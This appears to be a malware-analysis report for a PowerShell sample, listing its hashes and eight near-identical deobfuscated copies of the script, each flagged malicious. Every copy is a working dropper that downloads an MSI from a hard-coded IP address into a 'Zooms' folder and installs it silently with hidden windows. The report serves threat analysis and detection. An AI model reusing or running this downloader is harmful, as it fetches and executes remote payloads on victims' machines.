5d1208ad479e0b72ad2eebf849bee0d4
PowerShell | MD5: 5d1208ad479e0b72ad2eebf849bee0d4 | Size: 1.62 KB | application/x-powershell
| Hash | Hash Value |
|---|---|
| MD5 | 5d1208ad479e0b72ad2eebf849bee0d4 |
| Sha1 | 912138d93e657bb9d3c69cf2764cc809ee6cd730 |
| Sha256 | f3cc95f13557763ff23c2b7537a1708f0bb37ba4dcad7107debd9a911dbfe268 |
| Sha384 | 067e3f1932afa86fc010ed853add611256c77d39a3cfab4347ab304fbf4003acb8ffed9186628364cf4b26d2a184d7eb |
| Sha512 | e66019d8384a0119167c8c447be675036ce740f508fa268a81f591f409f615b86aaaed20ff2e82221e5bc409a43653d7cd011b77906909bbab939b6ae0f931f2 |
| SSDeep | 48:lkLzqRowIX6nVxVYyeMDra37vOPmfqHX4AfMHt:Qz8owIX6VxbDrarGPmSHVfMHt |
| TLSH | D03191912BE91204F2F77F457E7E84684A3B3C25DE31CB4C42A5194E06F2E60C866F7A |
| Name0 | Value |
|---|---|
| Deobfuscated PowerShell | $ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i "$filePath" /qn /norestart" -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" } |
| Deobfuscated PowerShell | $ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i " $filePath /qn /norestart -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" } |
| Deobfuscated PowerShell | $ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i " $filePath "/qn" "/norestart" -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" } |
| Deobfuscated PowerShell | $ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i " $filePath "/qn" "/norestart" -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" } |
| Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i "$filePath" /qn /norestart" -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" } Malicious |
5d1208ad479e0b72ad2eebf849bee0d4 |
| Deobfuscated PowerShell | $ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i " $filePath /qn /norestart -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" } Malicious |
5d1208ad479e0b72ad2eebf849bee0d4 > [Deobfuscated PS] |
| Deobfuscated PowerShell | $ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i " $filePath "/qn" "/norestart" -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" } Malicious |
5d1208ad479e0b72ad2eebf849bee0d4 > [Deobfuscated PS] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $ErrorActionPreference = "Stop" $url = "http://85.11.161.198:9191/YRJKHYWK.msi" $workDir = "C:\ProgramData\Zooms" $fileName = [Path]::"GetFileName"($url) $filePath = Join-Path $workDir $fileName New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null Add-Type -AssemblyName "System.Net.Http" $client = New-Object "System.Net.Http.HttpClient" $client."Timeout" = [TimeSpan]::"FromMinutes"(30) $response = $client."GetAsync"($url)."Result" $response."EnsureSuccessStatusCode"() $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result" [File]::"WriteAllBytes"($filePath, $bytes) $client."Dispose"() if ($filePath -like "*.msi") { Start-Process "msiexec.exe" -ArgumentList "/i " $filePath "/qn" "/norestart" -Wait -WindowStyle "Hidden" } else { Start-Process -FilePath $filePath -WindowStyle "Hidden" } Malicious |
5d1208ad479e0b72ad2eebf849bee0d4 > [Deobfuscated PS] > [Deobfuscated PS] > [Deobfuscated PS] |